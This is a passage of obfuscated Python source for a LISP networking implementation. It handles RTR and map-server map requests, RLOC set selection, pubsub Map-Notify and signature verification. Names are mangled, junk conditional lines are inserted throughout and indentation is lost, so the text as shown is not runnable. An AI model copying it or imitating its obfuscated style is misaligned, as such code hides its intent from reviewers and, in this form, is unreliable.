if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
if 76 - 76: oO0o * II111iiii
if 81 - 81: I11i
if 2 - 2: OoOoOO00
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
i111Iii11i1Ii = ( o00O00oOO00 . is_private_address ( ) == False )
iIi = o00O00oOO00 . print_address_no_iid ( )
if ( ( i111Iii11i1Ii and lisp_rtr_list . has_key ( iIi ) ) or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , o00O00oOO00 , None , IiiiIi1iiii11 )
return
if 1 - 1: o0oOOo0O0Ooo % oO0o * I1Ii111 - i1IIi - iII111i . oO0o
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
if 11 - 11: IiII + II111iiii
if 37 - 37: O0
if 98 - 98: IiII * OoooooooOO . iII111i
if 34 - 34: OoooooooOO + I1Ii111
lisp_send_map_reply ( lisp_sockets , IiiiIi1iiii11 , o00O00oOO00 , sport )
return
if 97 - 97: II111iiii + I11i + OOooOOo / i11iIiiIii - iII111i
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
if 67 - 67: I11i
if 91 - 91: OOooOOo / OoO0O00
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 36 - 36: I1IiiI . iII111i * I1Ii111 . IiII % I1ii11iIi11i
if 44 - 44: I11i % I1ii11iIi11i - OoooooooOO % iII111i
if 60 - 60: IiII % oO0o
if 11 - 11: I1Ii111 - II111iiii
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
if ( o00O00oOO00 . is_private_address ( ) ) : o00O00oOO00 = source
o0OOO = map_request . nonce
if 12 - 12: i11iIiiIii
iiI1I1IIi = map_request . target_eid
OOo0oOOO0 = map_request . target_group
if 9 - 9: OOooOOo * I1ii11iIi11i + iIii1I11I1II1 / OoO0O00 * OoooooooOO
OoO0oOOooOO = [ ]
for oooOO0 in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( oooOO0 == None ) : continue
I1II = lisp_rloc ( )
I1II . rloc . copy_address ( oooOO0 )
I1II . priority = 254
OoO0oOOooOO . append ( I1II )
if 60 - 60: IiII + I1IiiI
if 61 - 61: OoO0O00
i11 = lisp_nonce_echoing
iIi11III = map_request . keys
if 96 - 96: ooOoO0o - OoooooooOO * iIii1I11I1II1 . IiII - O0
if 7 - 7: iIii1I11I1II1 . OoO0O00
if 88 - 88: i1IIi * II111iiii / i11iIiiIii % IiII . IiII
if 93 - 93: OoOoOO00 * i1IIi . Ii1I
if 2 - 2: i1IIi
oOooo0o = map_request . json_telemetry
if ( oOooo0o != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( oOooo0o , ei = etr_in_ts )
if 84 - 84: i1IIi / Ii1I + OoOoOO00 % Ii1I . oO0o
if 74 - 74: OOooOOo - o0oOOo0O0Ooo - I1Ii111 - OoO0O00
IiiiIi1iiii11 = lisp_build_map_reply ( iiI1I1IIi , OOo0oOOO0 , OoO0oOOooOO , o0OOO , LISP_NO_ACTION ,
1440 , map_request , iIi11III , i11 , True , ttl )
lisp_send_map_reply ( lisp_sockets , IiiiIi1iiii11 , o00O00oOO00 , sport )
return
if 40 - 40: o0oOOo0O0Ooo . IiII * OoOoOO00
if 14 - 14: OOooOOo
if 18 - 18: i11iIiiIii % iII111i
if 70 - 70: O0 + iII111i % I11i % I1Ii111 + OoOoOO00 / ooOoO0o
if 35 - 35: IiII + OoO0O00
if 82 - 82: i1IIi - ooOoO0o / I11i + I11i % I1IiiI - OoooooooOO
if 56 - 56: I1ii11iIi11i
if 80 - 80: Oo0Ooo / OOooOOo / iII111i . o0oOOo0O0Ooo
if 43 - 43: IiII
if 74 - 74: OoooooooOO
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
OoO0oOOooOO = target_site_eid . registered_rlocs
if 88 - 88: Ii1I * o0oOOo0O0Ooo / oO0o
oOoo = lisp_site_eid_lookup ( seid , group , False )
if ( oOoo == None ) : return ( OoO0oOOooOO )
if 25 - 25: I1IiiI % ooOoO0o % i11iIiiIii * i11iIiiIii + I1ii11iIi11i
if 92 - 92: OOooOOo - Ii1I - Ii1I + o0oOOo0O0Ooo + OoO0O00 % Ii1I
if 24 - 24: I1Ii111 % oO0o + I1ii11iIi11i % II111iiii % I1Ii111 / I1ii11iIi11i
if 34 - 34: OoooooooOO * i11iIiiIii
iIi1i = None
OOO = [ ]
for o0oO0O00 in OoO0oOOooOO :
if ( o0oO0O00 . is_rtr ( ) ) : continue
if ( o0oO0O00 . rloc . is_private_address ( ) ) :
I1IIII1Iiii11 = copy . deepcopy ( o0oO0O00 )
OOO . append ( I1IIII1Iiii11 )
continue
if 15 - 15: I11i + iII111i
iIi1i = o0oO0O00
break
if 79 - 79: i11iIiiIii * IiII % iII111i
if ( iIi1i == None ) : return ( OoO0oOOooOO )
iIi1i = iIi1i . rloc . print_address_no_iid ( )
if 18 - 18: iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
if 100 - 100: i11iIiiIii
ooO00Oo0o0OOo = None
for o0oO0O00 in oOoo . registered_rlocs :
if ( o0oO0O00 . is_rtr ( ) ) : continue
if ( o0oO0O00 . rloc . is_private_address ( ) ) : continue
ooO00Oo0o0OOo = o0oO0O00
break
if 71 - 71: I11i * OOooOOo
if ( ooO00Oo0o0OOo == None ) : return ( OoO0oOOooOO )
ooO00Oo0o0OOo = ooO00Oo0o0OOo . rloc . print_address_no_iid ( )
if 92 - 92: o0oOOo0O0Ooo
if 31 - 31: O0 . o0oOOo0O0Ooo . O0 * OoOoOO00 - OoO0O00
if 80 - 80: II111iiii % oO0o
if 48 - 48: OOooOOo . II111iiii * OOooOOo - I11i / iIii1I11I1II1 / i11iIiiIii
Iii1I1 = target_site_eid . site_id
if ( Iii1I1 == 0 ) :
if ( ooO00Oo0o0OOo == iIi1i ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( iIi1i ) )
if 37 - 37: II111iiii % O0 + iIii1I11I1II1 - I1IiiI . I11i + I1ii11iIi11i
return ( OOO )
if 14 - 14: ooOoO0o % iIii1I11I1II1 % ooOoO0o / IiII + OOooOOo
return ( OoO0oOOooOO )
if 14 - 14: Oo0Ooo
if 79 - 79: I1ii11iIi11i % I1Ii111 % I11i - iII111i * OoOoOO00
if 48 - 48: O0 + OoOoOO00 - O0
if 79 - 79: ooOoO0o . OoOoOO00 / OoooooooOO - II111iiii
if 48 - 48: Oo0Ooo
if 59 - 59: OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: iII111i % iIii1I11I1II1 / OOooOOo - OoOoOO00
if ( Iii1I1 == oOoo . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( Iii1I1 ) )
return ( OOO )
if 98 - 98: I11i % oO0o . I1IiiI % OoOoOO00
return ( OoO0oOOooOO )
if 32 - 32: I1ii11iIi11i / Ii1I
if 54 - 54: I11i - i11iIiiIii
if 91 - 91: Ii1I - OoO0O00 - I1IiiI % OoO0O00 . o0oOOo0O0Ooo
if 85 - 85: ooOoO0o . ooOoO0o % Oo0Ooo . OOooOOo + OOooOOo / I1IiiI
if 69 - 69: i1IIi + II111iiii / Ii1I
if 4 - 4: I11i * OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - I1ii11iIi11i
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 * I11i * OoOoOO00
if 14 - 14: i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
I1iIii1ii = [ ]
OoO0oOOooOO = [ ]
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
if 60 - 60: I1ii11iIi11i * iII111i / OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
if 94 - 94: OoO0O00 . ooOoO0o
i111i1iIi1i = False
ii1i11Ii111 = False
for o0oO0O00 in registered_rloc_set :
if ( o0oO0O00 . priority != 254 ) : continue
ii1i11Ii111 |= True
if ( o0oO0O00 . rloc . is_exact_match ( mr_source ) == False ) : continue
i111i1iIi1i = True
break
if 21 - 21: O0
if 65 - 65: iIii1I11I1II1
if 83 - 83: iIii1I11I1II1 - iII111i
if 91 - 91: i11iIiiIii . I11i . i1IIi - Ii1I
if 37 - 37: O0
if 68 - 68: OoO0O00 - I1Ii111
if 66 - 66: Oo0Ooo % II111iiii / Ii1I . iII111i . OOooOOo . OOooOOo
if ( ii1i11Ii111 == False ) : return ( registered_rloc_set )
if 63 - 63: I11i / I11i + IiII - i1IIi / Ii1I
if 100 - 100: OoO0O00 * iIii1I11I1II1
if 65 - 65: II111iiii - iII111i - OOooOOo
if 97 - 97: OoooooooOO / I1ii11iIi11i
if 60 - 60: OOooOOo - I11i * IiII - o0oOOo0O0Ooo / I1IiiI
if 93 - 93: OoOoOO00 . O0 - OOooOOo
if 90 - 90: Oo0Ooo % iII111i % Oo0Ooo * I11i / OoOoOO00
if 49 - 49: I1ii11iIi11i * II111iiii
if 59 - 59: OoO0O00
if 81 - 81: i11iIiiIii
OOOo0O00OO00O = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 91 - 91: Oo0Ooo - iIii1I11I1II1 - iII111i . OoooooooOO . iII111i + Oo0Ooo
if 20 - 20: OoO0O00 . ooOoO0o - IiII
if 82 - 82: oO0o
if 26 - 26: I1ii11iIi11i
if 40 - 40: OOooOOo
for o0oO0O00 in registered_rloc_set :
if ( OOOo0O00OO00O and o0oO0O00 . rloc . is_private_address ( ) ) : continue
if ( multicast == False and o0oO0O00 . priority == 255 ) : continue
if ( multicast and o0oO0O00 . mpriority == 255 ) : continue
if ( o0oO0O00 . priority == 254 ) :
I1iIii1ii . append ( o0oO0O00 )
else :
OoO0oOOooOO . append ( o0oO0O00 )
if 90 - 90: OoOoOO00
if 21 - 21: i1IIi % oO0o + OOooOOo / I1ii11iIi11i % i1IIi
if 64 - 64: I1Ii111 - OoOoOO00 * OoooooooOO - I1Ii111
if 43 - 43: I1Ii111 + I11i - Ii1I + I11i - Oo0Ooo
if 63 - 63: IiII % I11i / OoOoOO00 % OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if ( i111i1iIi1i ) : return ( OoO0oOOooOO )
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
OoO0oOOooOO = [ ]
for o0oO0O00 in registered_rloc_set :
if ( o0oO0O00 . rloc . is_private_address ( ) ) : OoO0oOOooOO . append ( o0oO0O00 )
if 3 - 3: I1ii11iIi11i - O0
OoO0oOOooOO += I1iIii1ii
return ( OoO0oOOooOO )
if 46 - 46: iII111i
if 99 - 99: oO0o
if 85 - 85: I1Ii111 * iIii1I11I1II1 . OoOoOO00
if 20 - 20: I11i * O0 - OoooooooOO * OOooOOo % oO0o * iII111i
if 70 - 70: I11i + O0 . i11iIiiIii . OOooOOo
if 48 - 48: iIii1I11I1II1 * Ii1I - OoooooooOO / oO0o - OoO0O00 / i11iIiiIii
if 24 - 24: I1IiiI
if 63 - 63: I11i - iIii1I11I1II1 * Ii1I + OoooooooOO . i11iIiiIii
if 94 - 94: OoO0O00 . oO0o . OoOoOO00 * i11iIiiIii
if 96 - 96: i1IIi . OoO0O00 . OoO0O00 - o0oOOo0O0Ooo - Ii1I
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
I1IIiI = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
I1IIiI . add ( reply_eid )
return
if 30 - 30: I1Ii111 + oO0o + iIii1I11I1II1 % OoO0O00 / I1IiiI
if 55 - 55: Ii1I
if 14 - 14: i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 * OoO0O00 - ooOoO0o - Oo0Ooo . OoO0O00 % oO0o
if 98 - 98: OoO0O00 . i1IIi
if 58 - 58: i1IIi * O0 + I1ii11iIi11i . IiII
if 11 - 11: OOooOOo + iIii1I11I1II1 - ooOoO0o * OoO0O00 * i11iIiiIii
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 7 - 7: Oo0Ooo + ooOoO0o - I1Ii111 * iIii1I11I1II1
if 6 - 6: ooOoO0o % I1Ii111 % ooOoO0o . Ii1I * Oo0Ooo . IiII
def lisp_convert_reply_to_notify ( packet ) :
if 100 - 100: i1IIi . Ii1I . o0oOOo0O0Ooo + Ii1I - i1IIi . I11i
if 19 - 19: i11iIiiIii + I11i - IiII . iII111i * i1IIi
if 66 - 66: ooOoO0o
if 4 - 4: iII111i / iII111i * OOooOOo + o0oOOo0O0Ooo . I1Ii111 + II111iiii
O000oOooO0oo = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
O000oOooO0oo = socket . ntohl ( O000oOooO0oo ) & 0xff
o0OOO = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 24 - 24: O0 . I1ii11iIi11i / OOooOOo % IiII * Oo0Ooo / OoO0O00
if 67 - 67: Oo0Ooo * I11i - IiII + I1Ii111
if 90 - 90: iII111i % II111iiii % o0oOOo0O0Ooo + o0oOOo0O0Ooo + II111iiii
if 54 - 54: OoooooooOO . IiII - oO0o
i1OOoO0OO0oO = ( LISP_MAP_NOTIFY << 28 ) | O000oOooO0oo
O00O0OO = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
o00oOOo0Oo = struct . pack ( "I" , 0 )
if 26 - 26: o0oOOo0O0Ooo - i1IIi / I1ii11iIi11i / OoooooooOO . i1IIi
if 22 - 22: o0oOOo0O0Ooo * I1Ii111 * I1ii11iIi11i . OoOoOO00 . i1IIi % ooOoO0o
if 67 - 67: I11i
if 95 - 95: OoO0O00 % I1Ii111
packet = O00O0OO + o0OOO + o00oOOo0Oo + packet
return ( packet )
if 49 - 49: II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
def lisp_notify_subscribers ( lisp_sockets , eid_record , eid , site ) :
Ii1i1 = eid . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( Ii1i1 ) == False ) : return
if 79 - 79: iII111i . iIii1I11I1II1
for I1IIiI in lisp_pubsub_cache [ Ii1i1 ] . values ( ) :
OooO0OO0 = I1IIiI . itr
Oo0o = I1IIiI . port
IiI = red ( OooO0OO0 . print_address_no_iid ( ) , False )
Iii1i11 = bold ( "subscriber" , False )
IIiiII11i11I = "0x" + lisp_hex_string ( I1IIiI . xtr_id )
o0OOO = "0x" + lisp_hex_string ( I1IIiI . nonce )
if 83 - 83: IiII % iIii1I11I1II1
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( Iii1i11 , IiI , Oo0o , IIiiII11i11I , green ( Ii1i1 , False ) , o0OOO ) )
if 12 - 12: i11iIiiIii / o0oOOo0O0Ooo + o0oOOo0O0Ooo / iIii1I11I1II1 / OoooooooOO / Oo0Ooo
if 35 - 35: OoOoOO00 + II111iiii
lisp_build_map_notify ( lisp_sockets , eid_record , [ Ii1i1 ] , 1 , OooO0OO0 ,
Oo0o , I1IIiI . nonce , 0 , 0 , 0 , site , False )
I1IIiI . map_notify_count += 1
if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
return
if 96 - 96: IiII + i1IIi - I11i * I11i - OoO0O00 % II111iiii
if 47 - 47: I1Ii111 . i11iIiiIii + oO0o . I1ii11iIi11i
if 12 - 12: iIii1I11I1II1 % I1Ii111 * OoOoOO00 / OoooooooOO % OoooooooOO
if 81 - 81: iIii1I11I1II1 - Oo0Ooo - ooOoO0o . OoO0O00 + I1ii11iIi11i
if 84 - 84: iII111i . OOooOOo . iII111i * oO0o % Ii1I . oO0o
if 86 - 86: iII111i * ooOoO0o / iIii1I11I1II1 + Ii1I . iII111i
if 64 - 64: IiII - Oo0Ooo % iII111i % I11i
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 42 - 42: Oo0Ooo . OoO0O00
if 22 - 22: ooOoO0o - o0oOOo0O0Ooo + I11i / I1IiiI + OOooOOo
if 10 - 10: oO0o / I1IiiI
if 95 - 95: II111iiii - IiII % IiII . o0oOOo0O0Ooo
lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl , xtr_id )
if 19 - 19: II111iiii . ooOoO0o . I11i - OoooooooOO / I1ii11iIi11i . I1Ii111
iiI1I1IIi = green ( reply_eid . print_prefix ( ) , False )
OooO0OO0 = red ( itr_rloc . print_address_no_iid ( ) , False )
OoIiII = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( OoIiII ,
iiI1I1IIi , OooO0OO0 , xtr_id ) )
if 10 - 10: I1IiiI / I1Ii111 % IiII . OoOoOO00
if 65 - 65: II111iiii + OoO0O00 + OoO0O00
if 48 - 48: I1ii11iIi11i / iIii1I11I1II1
if 47 - 47: I1Ii111
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
return
if 41 - 41: IiII
if 25 - 25: I11i % iIii1I11I1II1
if 27 - 27: iIii1I11I1II1 . O0 . oO0o
if 21 - 21: oO0o * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo * IiII - o0oOOo0O0Ooo
if 90 - 90: i1IIi + I1ii11iIi11i * oO0o % i11iIiiIii - OoO0O00
if 12 - 12: OoO0O00 . I1ii11iIi11i - I1IiiI % OOooOOo
if 9 - 9: Ii1I / O0
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 95 - 95: iII111i / I11i
if 86 - 86: O0 / II111iiii . Oo0Ooo / Oo0Ooo * II111iiii
if 22 - 22: Ii1I
if 81 - 81: iIii1I11I1II1 . ooOoO0o % I11i
if 64 - 64: I1Ii111 . Oo0Ooo * o0oOOo0O0Ooo
if 32 - 32: oO0o . I1Ii111 * I1Ii111
iiI1I1IIi = map_request . target_eid
OOo0oOOO0 = map_request . target_group
Ii1i1 = lisp_print_eid_tuple ( iiI1I1IIi , OOo0oOOO0 )
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
IIiiII11i11I = map_request . xtr_id
o0OOO = map_request . nonce
iI1IIi1I = LISP_NO_ACTION
I1IIiI = map_request . subscribe_bit
if 32 - 32: I1Ii111 . Ii1I / i1IIi
if 2 - 2: OOooOOo * ooOoO0o / I11i + OoO0O00
if 96 - 96: II111iiii * OoO0O00 + I1ii11iIi11i + OoOoOO00 / II111iiii . iII111i
if 64 - 64: iII111i % Oo0Ooo
if 79 - 79: IiII + iII111i / II111iiii . i1IIi + iIii1I11I1II1
i11Ii11I1I1II = True
i1Oo0o = ( lisp_get_eid_hash ( iiI1I1IIi ) != None )
if ( i1Oo0o ) :
i1i11 = map_request . map_request_signature
if ( i1i11 == None ) :
i11Ii11I1I1II = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 57 - 57: II111iiii / i11iIiiIii . OoooooooOO
else :
I1IiI11 = map_request . signature_eid
ooO , OoOoOoooOoo0 , i11Ii11I1I1II = lisp_lookup_public_key ( I1IiI11 )
if ( i11Ii11I1I1II ) :
i11Ii11I1I1II = map_request . verify_map_request_sig ( OoOoOoooOoo0 )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( I1IiI11 . print_address ( ) , ooO . print_address ( ) ) )
if 5 - 5: Ii1I
if 16 - 16: i11iIiiIii . Oo0Ooo % I1IiiI % ooOoO0o
iIi111I1I = bold ( "passed" , False ) if i11Ii11I1I1II else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( iIi111I1I ) )
if 3 - 3: OOooOOo % OoooooooOO % o0oOOo0O0Ooo . i1IIi - ooOoO0o
if 30 - 30: oO0o + ooOoO0o . o0oOOo0O0Ooo
if 32 - 32: Oo0Ooo * I1ii11iIi11i / OoO0O00
if ( I1IIiI and i11Ii11I1I1II == False ) :
I1IIiI = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 69 - 69: ooOoO0o
if 64 - 64: OoooooooOO + OOooOOo
if 36 - 36: I1IiiI - Ii1I / I1ii11iIi11i + Oo0Ooo % I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 * OoO0O00
if 82 - 82: I1IiiI - OoO0O00 % o0oOOo0O0Ooo
if 72 - 72: O0 + OoOoOO00 % OOooOOo / oO0o / IiII
if 98 - 98: Oo0Ooo . II111iiii * I11i
if 39 - 39: IiII * o0oOOo0O0Ooo + Ii1I - I11i
if 70 - 70: oO0o * ooOoO0o / ooOoO0o - Ii1I * Ii1I % OOooOOo
if 91 - 91: OoO0O00 - OoO0O00 % O0
if 67 - 67: ooOoO0o * i1IIi
if 66 - 66: o0oOOo0O0Ooo - I1ii11iIi11i . OoOoOO00 / iII111i - Ii1I - i1IIi
if 97 - 97: oO0o % iII111i - OOooOOo . OoooooooOO
if 94 - 94: Oo0Ooo
IiiIii1I11iiIiIii = o00O00oOO00 if ( o00O00oOO00 . afi == ecm_source . afi ) else ecm_source
if 60 - 60: iII111i / I1IiiI / i11iIiiIii
oOOOO0ooo = lisp_site_eid_lookup ( iiI1I1IIi , OOo0oOOO0 , False )
if 59 - 59: ooOoO0o % I1IiiI + i1IIi * I1Ii111 % o0oOOo0O0Ooo * II111iiii
if ( oOOOO0ooo == None or oOOOO0ooo . is_star_g ( ) ) :
IIIiiIIiII11 = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( IIIiiIIiII11 ,
green ( Ii1i1 , False ) ) )
if 46 - 46: iIii1I11I1II1
if 97 - 97: O0 * OOooOOo - o0oOOo0O0Ooo % o0oOOo0O0Ooo * II111iiii % I11i
if 65 - 65: iIii1I11I1II1 / OOooOOo
if 2 - 2: I11i - OOooOOo / o0oOOo0O0Ooo
lisp_send_negative_map_reply ( lisp_sockets , iiI1I1IIi , OOo0oOOO0 , o0OOO , o00O00oOO00 ,
mr_sport , 15 , IIiiII11i11I , I1IIiI )
if 14 - 14: I11i + Oo0Ooo + i11iIiiIii - i1IIi . O0
return ( [ iiI1I1IIi , OOo0oOOO0 , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 47 - 47: o0oOOo0O0Ooo / i1IIi * IiII
if 50 - 50: I11i
iIIiIIiII111 = oOOOO0ooo . print_eid_tuple ( )
i11I11iiiI1 = oOOOO0ooo . site . site_name
if 76 - 76: i11iIiiIii / oO0o / II111iiii
if 49 - 49: i1IIi * II111iiii * Oo0Ooo % oO0o / II111iiii
if 8 - 8: I1IiiI . o0oOOo0O0Ooo / OoooooooOO - II111iiii
if 93 - 93: OoOoOO00 / OoOoOO00 / OoOoOO00
if 74 - 74: ooOoO0o % Oo0Ooo - iII111i - I1IiiI
if ( i1Oo0o == False and oOOOO0ooo . require_signature ) :
i1i11 = map_request . map_request_signature
I1IiI11 = map_request . signature_eid
if ( i1i11 == None or I1IiI11 . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( i11I11iiiI1 ) )
i11Ii11I1I1II = False
else :
I1IiI11 = map_request . signature_eid
ooO , OoOoOoooOoo0 , i11Ii11I1I1II = lisp_lookup_public_key ( I1IiI11 )
if ( i11Ii11I1I1II ) :
i11Ii11I1I1II = map_request . verify_map_request_sig ( OoOoOoooOoo0 )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( I1IiI11 . print_address ( ) , ooO . print_address ( ) ) )
if 51 - 51: i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
iIi111I1I = bold ( "passed" , False ) if i11Ii11I1I1II else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( iIi111I1I ) )
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
if ( i11Ii11I1I1II and oOOOO0ooo . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( i11I11iiiI1 , green ( iIIiIIiII111 , False ) , green ( Ii1i1 , False ) ) )
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
if ( oOOOO0ooo . accept_more_specifics == False ) :
iiI1I1IIi = oOOOO0ooo . eid
OOo0oOOO0 = oOOOO0ooo . group
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
Oo0o0 = 1
if ( oOOOO0ooo . force_ttl != None ) :
Oo0o0 = oOOOO0ooo . force_ttl | 0x80000000
if 6 - 6: O0 * Oo0Ooo
if 20 - 20: OoooooooOO * i1IIi * IiII / OoooooooOO - Oo0Ooo / i11iIiiIii
if 28 - 28: iIii1I11I1II1 % OOooOOo * I1IiiI
if 28 - 28: O0 . OoOoOO00
if 27 - 27: I1ii11iIi11i / II111iiii + O0 % I1ii11iIi11i
lisp_send_negative_map_reply ( lisp_sockets , iiI1I1IIi , OOo0oOOO0 , o0OOO , o00O00oOO00 ,
mr_sport , Oo0o0 , IIiiII11i11I , I1IIiI )
if 72 - 72: I1IiiI - i1IIi
return ( [ iiI1I1IIi , OOo0oOOO0 , LISP_DDT_ACTION_MS_NOT_REG ] )
if 11 - 11: iIii1I11I1II1 . OoO0O00 * Ii1I
if 65 - 65: Oo0Ooo / OoooooooOO
if 60 - 60: II111iiii + I1IiiI % oO0o - o0oOOo0O0Ooo
if 50 - 50: iIii1I11I1II1 - i11iIiiIii / iII111i + ooOoO0o / OOooOOo
if 80 - 80: IiII / OoooooooOO
oO0ooo = False
Ii1 = ""
oO0Oooo = False
if ( oOOOO0ooo . force_nat_proxy_reply ) :
Ii1 = ", nat-forced"
oO0ooo = True
oO0Oooo = True
elif ( oOOOO0ooo . force_proxy_reply ) :
Ii1 = ", forced"
oO0Oooo = True
elif ( oOOOO0ooo . proxy_reply_requested ) :
Ii1 = ", requested"
oO0Oooo = True
elif ( map_request . pitr_bit and oOOOO0ooo . pitr_proxy_reply_drop ) :
Ii1 = ", drop-to-pitr"
